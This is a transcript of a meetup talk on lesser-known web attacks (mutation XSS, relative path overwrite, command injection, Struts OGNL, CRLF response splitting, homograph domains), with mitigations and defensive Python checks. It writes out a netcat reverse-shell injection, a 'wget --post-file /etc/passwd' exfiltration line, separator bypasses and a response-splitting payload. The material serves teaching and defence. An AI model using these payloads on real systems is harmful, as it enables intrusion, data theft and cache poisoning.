Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang


Transcript of Null Mumbai 14th May Lesser Known Webapp attacks by Ninad Sarang


Lesser Known WebAppAttacks

About me

• Consultant at Aujas Networks

• Part-time bug hunter

• Independent security researcher

• Blogger: http://infinite8security.blogspot.in


Menu Card

• Cross site scripting: Mutation XSS, RPO XSS, Zombie XSS

• Remote Command Execution

• CR-LF Attack

• Homograph Attack

• It's all about PoPuP


Cross site Scripting - Mutation XSS


HTML-encoded payload inside a <listing> element:

<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>

As written this is harmless: the angle brackets are entities, so the browser renders the tag as text. Now read the same fragment back through the innerHTML property, which is what templating code, rich-text editors and string-based sanitizers do before re-inserting it into the page:

<listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>

<script>alert(document.getElementById('x').innerHTML)</script>

When this code executes, the browser serializes the element for document.getElementById('x').innerHTML. Internet Explorer writes the text content of <listing> back without re-encoding it, so the alert shows <img src=1 onerror=alert(1)> with real angle brackets. Any code that assigns that string to innerHTML again inserts a live <img> element and the onerror handler fires. The markup has gone through a second level of decoding and mutated from a safe to an unsafe state, which is why this is called mutation XSS (mXSS).


Mitigation:

Server-side mitigation

• Avoid emitting markup that the browser serializes incorrectly (for example entity-encoded text inside <listing>).

• Replace the flawed markup with semantically equivalent markup that the browser serializes correctly.

Client-side mitigation

• Browsers should implement ECMAScript 5 and higher.

• TrueHTML: TrueHTML relies on the XMLSerializer DOM object provided by all of the user agents, which produces a well-formed serialization instead of the lossy innerHTML string.

• https://cure53.de/fp170.pdf
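The practical defence against a mutation is to check that a fragment survives a parse, serialize, parse round trip unchanged, and to reject or re-sanitize it if it does not. The following Python is an added example, not code from the talk or from the cure53 paper: the legacy_serialize() function is a model of the Internet Explorer behaviour described above (text inside <listing> and <xmp> written back unescaped), not a real browser, and RAW_TEXT_ELEMENTS is an assumption made for the demonstration.

```python
"""Round-trip stability check against innerHTML mutation (model of the IE quirk)."""
from html import escape
from html.parser import HTMLParser

# Assumption for the demo: elements whose text the modelled legacy innerHTML
# getter writes back without entity encoding (the slide's <listing> case).
RAW_TEXT_ELEMENTS = {"listing", "xmp"}

# The payload from the slide.
SLIDE_PAYLOAD = "<listing>&lt;img src=1 onerror=alert(1)&gt;</listing>"


class TokenParser(HTMLParser):
    """Flatten an HTML fragment into a list of comparable tokens."""

    def __init__(self):
        super().__init__(convert_charrefs=True)  # entities decoded, like a DOM
        self.tokens = []

    def handle_starttag(self, tag, attrs):
        self.tokens.append(("start", tag, tuple(attrs)))

    def handle_endtag(self, tag):
        self.tokens.append(("end", tag))

    def handle_data(self, data):
        if data:
            self.tokens.append(("text", data))


def parse(fragment):
    """Parse and merge adjacent text tokens so comparisons are stable."""
    p = TokenParser()
    p.feed(fragment)
    p.close()
    merged = []
    for tok in p.tokens:
        if tok[0] == "text" and merged and merged[-1][0] == "text":
            merged[-1] = ("text", merged[-1][1] + tok[1])
        else:
            merged.append(tok)
    return merged


def legacy_serialize(tokens):
    """Serialize like the modelled legacy innerHTML getter: correct everywhere
    except inside raw-text elements, where decoded text is written back as-is."""
    out = []
    raw_depth = 0
    for tok in tokens:
        if tok[0] == "start":
            _, tag, attrs = tok
            rendered = "".join(
                f" {name}" if value is None else f' {name}="{escape(value, quote=True)}"'
                for name, value in attrs
            )
            out.append(f"<{tag}{rendered}>")
            if tag in RAW_TEXT_ELEMENTS:
                raw_depth += 1
        elif tok[0] == "end":
            out.append(f"</{tok[1]}>")
            if tok[1] in RAW_TEXT_ELEMENTS and raw_depth:
                raw_depth -= 1
        else:
            text = tok[1]
            out.append(text if raw_depth else escape(text, quote=False))
    return "".join(out)


def round_trip_is_stable(fragment):
    """True when parse -> serialize -> parse gives the same tree. A sanitizer
    should refuse (or re-sanitize) any fragment for which this is False."""
    first = parse(fragment)
    second = parse(legacy_serialize(first))
    return first == second


if __name__ == "__main__":
    print(legacy_serialize(parse(SLIDE_PAYLOAD)))  # the mutated string
    print(round_trip_is_stable(SLIDE_PAYLOAD))      # False: reject it
```

The same check is what DOM-based sanitizers do in the browser: serialize the cleaned DOM, parse it again, and compare, so that a fragment which only becomes dangerous after a round trip never reaches innerHTML.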


Cross site Scripting - RPO XSS

Relative Path Overwrite XSS

• Difference between absolute and relative URL

• Absolute URL: https://thehacker.co.in/test

• Relative URL: test/some_subdirectory (resolved against the directory of the current page, so the page's own path decides where it points)

To exploit this finding three things are necessary:

1) stored XSS that allows CSS injection (attacker-controlled text in the page body that will be parsed as CSS),

2) URL rewriting (the server returns the same page for /index.php3/ as for /index.php3),

3) relative addressing of the CSS style sheet (href="style.css" rather than href="/style.css").


DEMO

• Step 1: Let's visit www.webdevelopersnotes.com/graphics/index.php3

• To check for URL rewriting, add a trailing '/'. If /graphics/index.php3/ still returns the page, the relative style sheet reference now resolves to /graphics/index.php3/<name>.css, i.e. to the page itself, and the page body (including the stored payload) is parsed as CSS.

• Open the rewritten URL with the XSS payload in IE and see the magic ;) (IE is used because it parses the HTML page as a style sheet even though it is not served as text/css.)

• http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php/

Mitigation:

• It is recommended that absolute URLs be used throughout a site.

• Otherwise root-relative URLs (starting with '/') should be used; they resolve against the host, not against the current path.
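To see why the trailing slash matters, resolve the style sheet references yourself. The following Python is an added example, not code from the talk: it extracts <link rel="stylesheet"> references from a page and resolves each one both against the normal URL and against the same URL with a '/' appended, the way a browser would. The host example.test and the sample HTML are constructed for the demonstration.

```python
"""Relative path overwrite exposure check for a page's style sheet links."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page: one path-relative and one root-relative style sheet.
SAMPLE_PAGE_URL = "http://example.test/graphics/index.php3"
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="style.css">
<link rel="stylesheet" href="/css/site.css">
</head><body>{}*{{background:red}}</body></html>"""


class StylesheetLinks(HTMLParser):
    """Collect href values of <link rel="stylesheet"> elements."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "link" and (a.get("rel") or "").lower() == "stylesheet" and a.get("href"):
            self.hrefs.append(a["href"])


def is_path_relative(href):
    """True for 'style.css' or 'css/style.css'; False for '/style.css' or full URLs."""
    parts = urlsplit(href)
    return not parts.scheme and not parts.netloc and not parts.path.startswith("/")


def rpo_exposure(page_url, html):
    """For every style sheet link, report where it resolves normally and where it
    resolves once the request path gains a trailing slash (what URL rewriting
    lets an attacker do). A link that moves is an RPO candidate."""
    parser = StylesheetLinks()
    parser.feed(html)
    rewritten_url = page_url.rstrip("/") + "/"
    report = []
    for href in parser.hrefs:
        normal = urljoin(page_url, href)
        under_rpo = urljoin(rewritten_url, href)
        report.append({
            "href": href,
            "normal": normal,
            "with_trailing_slash": under_rpo,
            "vulnerable": is_path_relative(href) and normal != under_rpo,
        })
    return report


if __name__ == "__main__":
    for entry in rpo_exposure(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(entry)
```

The root-relative link resolves to the same URL in both cases, which is the mitigation in action; the path-relative one is pulled under /graphics/index.php3/, so a server that rewrites that path back to the page serves the page body as the style sheet.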


Cross site Scripting - Zombie XSS


Remote/OS Command Execution

Example injected input (a hostname followed by a second command that spawns a reverse shell):

www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash


Now what if ( ; ) is blocked by the application?

X ; Y = separating commands (run X and then Y, regardless of the success of X)

X | Y = pipe (run X and pass the output of X to Y)

X ^ Y = pipe in the old Bourne shell (^ was a synonym for |)

X && Y = AND (run Y only if X succeeded)

X || Y = OR (run Y only if X failed)

X %0A Y %0A Z = newline (a line feed separates commands just as ; does; %0D, carriage return, is sometimes tried too, but only the line feed is a separator in POSIX shells, so %0D%0A is the usual URL-encoded form)

` X ` = backtick (run X and substitute its output into the command line)

X & Y = background (start X in the background and run Y immediately, regardless of the success of X)

$( X ) = command substitution, same effect as backticks

Once a second command runs:

nc -e /bin/sh = netcat reverse shell

wget --post-file /etc/passwd = exfiltrate a file with wget
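The separators above are easiest to believe when you run them against a filter that only strips ';'. The following Python is an added example, not code from the talk: vulnerable_lookup() concatenates user input into a shell command the way the attacked application does, with a plain echo standing in for the real ping/nslookup so it runs anywhere with /bin/sh, and hardened_lookup() shows the fix (an allowlist plus an argv list, so no shell ever parses the input). The payloads are constructed for the demonstration.

```python
"""Command injection separators versus a ';'-only filter, and the hardened form."""
import re
import subprocess


def naive_filter(user_input):
    """The application's idea of validation: drop ';' and nothing else."""
    return user_input.replace(";", "")


def vulnerable_lookup(host):
    """String concatenation into a shell command (assumes /bin/sh is present)."""
    cmd = "echo target=" + naive_filter(host)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


# Bypasses from the slide's list; each still runs 'echo injected'.
BYPASSES = {
    "and":        "x && echo injected",
    "pipe":       "x | echo injected",
    "newline":    "x\necho injected",      # what %0A becomes after URL decoding
    "backtick":   "`echo injected`",
    "subshell":   "$(echo injected)",
    "background": "x & echo injected",
}


def demonstrate_bypasses():
    """Run every bypass through the vulnerable function; returns name -> output."""
    return {name: vulnerable_lookup(payload) for name, payload in BYPASSES.items()}


# Hardened version: allowlist the value, then pass it as ONE argv element.
HOSTNAME = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")


def is_valid_hostname(host):
    return HOSTNAME.fullmatch(host) is not None


def hardened_lookup(host):
    """No shell, no metacharacters: the value cannot become a second command."""
    if not is_valid_hostname(host):
        raise ValueError("not a hostname: %r" % host)
    return subprocess.run(["echo", "target=" + host], capture_output=True, text=True).stdout


if __name__ == "__main__":
    print(repr(vulnerable_lookup("x; echo injected")))   # filter 'works' for ;
    for name, out in demonstrate_bypasses().items():
        print(name, repr(out))                            # every one says injected
    print(repr(hardened_lookup("www.nsa.gov")))
```

Note that the fix is the argv list together with the allowlist; the list alone stops the shell from interpreting metacharacters, and the allowlist stops option injection (a value starting with '-') against the invoked program.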


RCE never dies!!!

• The "action:", "redirect:" and "redirectAction:" parameter prefixes are not properly sanitized.

• The information after the prefix is evaluated as an OGNL (Object-Graph Navigation Language) expression against the value stack, which introduces the possibility to inject server-side code.

Apache Struts 2 RCE (S2-016, CVE-2013-2251; fixed in Struts 2.3.15.1)

http://host/struts2-blank/example/X.action?action:${3*4}

A probe like this is enough to confirm evaluation: with the redirect: prefix the evaluated value ends up in the Location header of the 302, so ${3*4} comes back as 12.


DEMO


Divide and Conquer: CR-LF Attack

• CR stands for Carriage Return (CR, ASCII 13, \r)

• LF stands for Line Feed (LF, ASCII 10, \n)

How does this attack work?

The server script embeds user data in HTTP response headers without removing CR and LF, so the data can terminate the header line and start a second response of the attacker's choosing (HTTP response splitting).

Example: Step 1: There is a redirection page "redir_lang.jsp". It takes the lang parameter and sends the browser to by_lang.jsp with that value embedded, unchecked, in the Location header:

<% response.sendRedirect("/by_lang.jsp?lang="+
request.getParameter("lang")); %>


Let's attack ;)

Step 3: Instead of passing the value English, let's pass our attack vector as shown.

/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>

Note: We have URL-encoded the CRLF sequences (%0d%0a) and the spaces (%20). The injected Content-Length: 0 closes the server's own response early; the injected Content-Length: 19 matches the byte length of <html>Shazam</html>.

Let's see what the server responds with.


A first HTTP response, which is a 302 (redirection) response: its Location header ends at the first injected CRLF and the injected Content-Length: 0 tells the client that its body is empty.

A second HTTP response, which is a 200 response with content comprising 19 bytes of HTML (<html>Shazam</html>).

Superfluous data: whatever the server appended after the lang value (the rest of its own headers), which the client discards.

So when the attacker feeds the target (for example a caching proxy in front of the server) with two requests, the first being to the URL

/redir_lang.jsp?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0a<html>Shazam</html>

and the second to the URL /index.html,

the target would believe that the first request is matched to the first response, and that the second request (to /index.html) is matched to the second response: /index.html is now "Shazam" as far as the target is concerned.
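The pairing of requests with responses is easiest to see in bytes. The following Python is an added example, not code from the talk: build_vulnerable_redirect() is a model of what the JSP's sendRedirect() writes when the lang value is pasted into the Location header unchecked (a real server adds more headers, which then become the "superfluous data"), split_responses() reads the byte stream the way a proxy or browser pairs pipelined responses, and safe_header_value() is the fix: refuse CR and LF in anything that goes into a header.

```python
"""HTTP response splitting, reproduced in bytes, with the header-value check."""

CRLF = "\r\n"

# The slide's attack vector after URL decoding (constructed to match the slide).
SLIDE_PAYLOAD = (
    "foobar" + CRLF + "Content-Length: 0" + CRLF + CRLF
    + "HTTP/1.1 200 OK" + CRLF + "Content-Type: text/html" + CRLF
    + "Content-Length: 19" + CRLF + CRLF + "<html>Shazam</html>"
)


def build_vulnerable_redirect(lang):
    """Model of the redirect the vulnerable redir_lang.jsp emits."""
    return (
        "HTTP/1.1 302 Moved Temporarily" + CRLF
        + "Location: /by_lang.jsp?lang=" + lang + CRLF
        + "Content-Type: text/html" + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    ).encode("latin-1")


def split_responses(stream):
    """Read consecutive HTTP responses from a byte stream: status line, headers,
    then Content-Length bytes of body. Returns (messages, leftover_bytes) where
    each message is (status_line, headers_dict, body)."""
    messages = []
    while stream.startswith(b"HTTP/"):
        head, sep, rest = stream.partition(b"\r\n\r\n")
        if not sep:
            break
        lines = head.split(b"\r\n")
        status = lines[0].decode("latin-1")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
        length = int(headers.get("content-length", "0"))
        body, stream = rest[:length], rest[length:]
        messages.append((status, headers, body))
    return messages, stream


def header_value_is_safe(value):
    """A header value may not contain CR, LF or NUL."""
    return not any(ch in value for ch in "\r\n\0")


def safe_header_value(value):
    """The fix: reject (do not merely strip) line breaks before they reach a header."""
    if not header_value_is_safe(value):
        raise ValueError("CR/LF in header value")
    return value


if __name__ == "__main__":
    messages, leftover = split_responses(build_vulnerable_redirect(SLIDE_PAYLOAD))
    for status, headers, body in messages:
        print(status, headers, body)
    print("superfluous:", leftover)
```

With lang=English the stream parses as exactly one response; with the slide's payload it parses as two, and whichever request the target sends next gets the 19-byte "Shazam" page. Modern servlet containers apply the same rejection inside sendRedirect() and setHeader(), which is why the raw JSP above no longer splits on them; the check still belongs in any code that writes headers itself.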


What can an attacker do with a CRLF attack?

• Cross site scripting >> http://blog.innerht.ml/twitter-crlf-injection

• Web cache poisoning (defacement)

• Cross-user attacks (single user, single page, temporary defacement)

• Hijacking pages with user-specific information

• Browser cache poisoning

Mitigation: reject CR and LF in any user-supplied value before it is placed into a response header (Location, Set-Cookie, custom headers); stripping is second best, encoding the value is not enough on its own.


Homograph Attack

Can you tell the difference?

1) https://ebаy.com/

2) https://ebay.com/


What is this all about? http://ebаy.com/

Encoded as punycode (the ASCII form that DNS actually resolves): http://xn--eby-7cd.com/

The third letter is the Cyrillic small letter а (U+0430), not the Latin a; the two look identical on screen, but they are different characters and different domain names.


What can an attacker do with a homograph attack?

• Phishing

• Un-validated redirection

• Fake websites

• Attacker may combine this with SSL attacks: http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

Mitigation

[Before / After screenshots]

Browsers now show the punycode form (xn--...) in the address bar when a label mixes scripts, which is what turns the "before" into the "after"; an application that accepts or displays URLs should apply the same check before redirecting to or rendering a hostname.
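The check is cheap to implement. The following Python is an added example, not code from the talk: it converts a hostname to the ASCII form the resolver sees, flags labels that mix scripts, and maps a short constructed list of Cyrillic lookalikes to their Latin twins to show what the name is imitating. The script_of() heuristic (classification from the Unicode character name) and the CONFUSABLE table are simplifications assumed for the demonstration; the Unicode confusables data is the authoritative source.

```python
"""Homograph hostname check: punycode form, mixed-script labels, lookalikes."""
import unicodedata

# Constructed short list of Cyrillic letters that render like Latin ones.
CONFUSABLE = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0445": "x", "\u0443": "y", "\u0456": "i",
}


def script_of(ch):
    """Rough script detection from the Unicode name ('LATIN SMALL LETTER E' ...)."""
    name = unicodedata.name(ch, "")
    for script in ("LATIN", "CYRILLIC", "GREEK", "ARMENIAN"):
        if name.startswith(script):
            return script
    return "OTHER" if ch.isalpha() else "COMMON"   # digits, '-', etc. are neutral


def analyse_hostname(host):
    """Return the ASCII (punycode) form and per-label findings."""
    ascii_form = host.encode("idna").decode("ascii")
    findings = []
    for label in host.split("."):
        scripts = {script_of(c) for c in label} - {"COMMON"}
        lookalike = "".join(CONFUSABLE.get(c, c) for c in label)
        findings.append({
            "label": label,
            "mixed_script": len(scripts) > 1,
            "looks_like": lookalike if lookalike != label else None,
        })
    suspicious = any(f["mixed_script"] or f["looks_like"] for f in findings)
    return {"host": host, "ascii": ascii_form, "labels": findings, "suspicious": suspicious}


if __name__ == "__main__":
    for host in ("eb\u0430y.com", "ebay.com"):
        print(analyse_hostname(host))
```

The ASCII form is what to log and compare against allowlists; the Unicode form is only for display, and only once the label has passed the mixed-script and lookalike checks.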

Thank You

Reach me @

LinkedIn: Ninad Sarang

Twitter: @hbkninad